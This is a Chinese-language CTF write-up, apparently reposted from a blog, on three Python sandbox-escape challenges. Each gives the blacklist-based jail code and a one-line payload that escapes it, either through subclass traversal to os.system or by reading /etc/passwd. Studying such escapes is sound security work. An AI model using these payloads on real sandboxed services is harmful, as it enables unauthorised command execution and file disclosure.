python沙箱逃逸的几道题

第一道

from __future__ import print_function

print("Welcome to my Python sandbox! Enter commands below!")

# Substrings that may not appear anywhere in a submitted line. The check
# below lowercases both sides, so capitalisation does not matter. This is a
# blacklist on the *text* of the line only; it says nothing about which
# objects the line can still reach through attribute access (the payload
# below is an example).
banned = [
    "import",
    "exec",
    "eval",
    "pickle",
    "os",
    "subprocess",
    "kevin sucks",
    "input",
    "banned",
    "cry sum more",
    "sys"
]

# Delete every builtin except the two the loop below relies on. Python 2:
# dict.keys() returns a fresh list, so .remove() works and the subsequent
# deletes cannot disturb the iteration.
targets =__builtins__.__dict__.keys()
targets.remove('raw_input')
targets.remove('print')
for x in targets:
    del __builtins__.__dict__[x]

# `while 1` rather than `while True`: in Python 2 `True` is itself an
# ordinary builtin name, and it was just deleted along with the others.
while 1:
    print(">>>", end=' ')
    data = raw_input()

    for no in banned:
        if no.lower() in data.lower():
            print("Nobueno")
            break
    else: # for/else: only reached when no banned word matched
        # Runs in this module's globals, so `banned` and `targets` are in
        # scope for the submitted code (presumably why "banned" is listed).
        exec data

payload: ().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals['linecache'].__dict__['o'+'s'].__dict__['sy'+'stem']('ls')

第二道

#!/usr/bin/env python
from re import findall
def make_secure():
    """Unbind a fixed set of builtin names from ``__builtins__``.

    Only the *names* are removed from the builtins namespace; the objects
    they referred to are untouched and remain reachable through any other
    reference to them.

    Raises:
        KeyError: if one of the names is already absent (e.g. on a second
            call, or on an interpreter that lacks ``file``/``execfile``).
    """
    namespace = __builtins__.__dict__
    for name in (
        'open', 'file', 'execfile', 'compile',
        'reload', '__import__', 'eval', 'input',
    ):
        del namespace[name]

# Remove dangerous builtins. Only the names disappear from the builtins
# namespace; the objects behind them stay alive and can be reached through
# any other reference (the payload below does exactly that).
make_secure()
print 'Go Ahead, Expoit me >;D'
while True:
    try:
        # Trailing comma: keep the prompt on the same line as the input.
        print ">>>",
        # Read user input until the first whitespace character. A blank
        # line gives findall() nothing, so [0] raises IndexError, which the
        # handler below reports like any other error.
        inp = findall('\S+', raw_input())[0]
        a = None
        # Set a to the result from executing the user input. The exec runs
        # in this module's globals, so the expression sees `make_secure`,
        # `findall` and `inp` as well as every builtin that survived.
        exec 'a=' + inp
        print 'Return Value:', a
    except Exception, e:
        # Any failure (syntax error, the IndexError above, an error raised
        # by the expression) is echoed and the loop simply continues.
        print 'Exception:', e

payload:().class.bases[0].subclasses()[40]("/etc/passwd").read()

前两道环境是py2,第三道是py3

第三道

# -*-coding:utf-8-*-  

#!/usr/bin/python3  
import sys, cmd, os  

# Unbind the two builtins that load or evaluate code directly. Only the
# names go away: `os` was already imported above and this module keeps its
# reference, so code exec'd in these globals can still reach it.
__builtins__.__dict__.pop('__import__')
__builtins__.__dict__.pop('eval')

# Banner handed to Jail().cmdloop() at startup. The "rules" listed here are
# informational only; the actual enforcement is the substring filter in
# Jail.postcmd.
intro = """ 
pwnhub cuit 
pwn everything 
Rules: 
 -No import 
 -No ... 
 -No flag 

"""  

def execute(command):
    """Execute *command* as Python source in this module's global namespace.

    Nothing is sandboxed here: the code runs with full access to everything
    defined at module level, including the imported ``sys``, ``cmd`` and
    ``os`` modules. Any exception the code raises propagates to the caller.
    """
    module_namespace = globals()
    exec(command, module_namespace)

class Jail(cmd.Cmd):
    """Interactive shell that runs each input line through ``execute``.

    Before a line is executed it is checked against ``filtered``: if any of
    those substrings occurs anywhere in the raw line, the line is refused.
    The check is a plain substring blacklist on the text; it does not look
    at what the line evaluates to, so names that are not listed and are not
    reached through a dot (``getattr`` and the module-level ``os`` import,
    for instance) remain usable from executed code.
    """

    prompt = '>>> '

    # Substrings that cause a line to be rejected; matched case-sensitively.
    filtered = [
        "'", '.', 'input', 'if', 'else', 'eval', 'exit', 'import', 'quit',
        'exec', 'code', 'const', 'vars', 'str', 'chr', 'ord', 'local',
        'global', 'join', 'format', 'replace', 'translate', 'try', 'except',
        'with', 'content', 'frame', 'back',
    ]

    def do_EOF(self, line):
        """Terminate the process when the input stream ends."""
        sys.exit()

    def emptyline(self):
        """Defer to the base class behaviour for an empty line."""
        return super().emptyline()

    def default(self, line):
        """Emit a single NUL byte for any line that is not a ``do_*`` command.

        Free-form Python lines all land here first; they are then executed
        by ``postcmd``.
        """
        sys.stdout.write('\x00')

    def postcmd(self, stop, line):
        """Run after every command: reject filtered lines, execute the rest.

        Errors raised by the executed line are reported on stdout together
        with the offending line; a NameError gets its own wording. Returns
        whatever ``cmd.Cmd.postcmd`` returns, i.e. ``stop`` unchanged.
        """
        hits = [word for word in self.filtered if word in line]
        if hits:
            print("You are a big hacker !!!")
            print("Go away")
        else:
            try:
                execute(line)
            except NameError:
                print("NameError: name '%s' is not defined" % line)
            except Exception:
                print("Error: %s" % line)
        return super().postcmd(stop, line)

if __name__ == "__main__":  
 # Ctrl-C ends the session with a short message instead of a traceback.
 try:  
     Jail().cmdloop(intro)  
 except KeyboardInterrupt:  
     print("\rSee you next time !")

payload:print(getattr(os, "system")("whoami"))

等有空好好看看python面向对象的那一块知识

参考链接:
http://www.php.cn/python-tutorials-356723.html
http://blog.51cto.com/13620939/2075204
https://xz.aliyun.com/t/52#toc-0
http://www.k0rz3n.com/2018/05/04/Python%20%E6%B2%99%E7%9B%92%E9%80%83%E9%80%B8%E5%A4%87%E5%BF%98/
http://www.bendawang.site/2018/03/01/%E5%85%B3%E4%BA%8EPython-sec%E7%9A%84%E4%B8%80%E4%BA%9B%E6%80%BB%E7%BB%93/


转载自www.cnblogs.com/afanti/p/10097743.html